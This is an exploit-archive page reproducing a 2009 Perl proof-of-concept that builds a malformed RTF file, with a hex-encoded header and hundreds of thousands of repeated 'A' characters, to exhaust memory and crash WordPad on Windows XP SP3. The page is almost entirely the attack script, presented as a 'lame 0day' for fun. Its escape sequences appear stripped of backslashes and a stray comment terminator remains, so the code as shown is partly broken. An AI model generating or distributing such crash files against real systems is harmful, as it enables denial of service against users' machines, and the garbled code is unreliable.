MS Wordpad on winXP SP3 Local Crash Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Wordpad on winXP SP3 Local Crash Exploit
# Published : 2009-08-12
# Author : murderkey
# Previous Title : EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoC
# Next Title : Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC

#!/usr/bin/perl
#Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
#Works on WinXP SP3!
#bug found by murderkey in Hellcode Labs.
#exploit coded by karak0rsan aka musashi
#Hellcode Resarch
#just a fuckin' lame 0day bug for fun!

$file = "hellcoded.rtf";
$header =
"x7bx5cx72x74x66x31x5cx61x6ex73x69x5cx61x6ex73x69x63x70x67x31x32".
"x35x34x5cx64x65x66x66x30x5cx64x65x66x6cx61x6ex67x31x30x35x35x7b".
"x5cx66x6fx6ex74x74x62x6cx7bx5cx66x30x5cx66x73x77x69x73x73x5cx66".
"x63x68x61x72x73x65x74x31x36x32x7bx5cx2ax5cx66x6ex61x6dx65x20x41".
"x72x69x61x6cx3bx7dx41x72x69x61x6cx20x54x55x52x3bx7dx7dx0ax7bx5c".
"x2ax5cx67x65x6ex65x72x61x74x6fx72x20x4dx73x66x74x65x64x69x74x20".
"x35x2ex34x31x2ex31x35x2ex31x35x31x35x3bx7dx5cx76x69x65x77x6bx69".
"x6ex64x34x5cx75x63x31x5cx70x61x72x64x5cx66x30x5cx66x73x32x30";

$subheader = "x5cx41x41x41x41x41x5cx41x41x41x41x5cx70x61x72x0ax7dx0ax00";
$ekheader = "x5cx70x61x72x0a";
$buffer = "A" x 578001;
$buffer2 = "A" x 289000;
$buffer3 = "A" x 18186;
$buffer4 = "A" x 863973;
$buffer5= "A" x 578000;
$memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.$subheader;
   open(file, '>' . $file);
   print file $memory;
   close(file);
print "File PoC exploit has created!n";

exit(); */

# www.Syue.com [2009-08-12]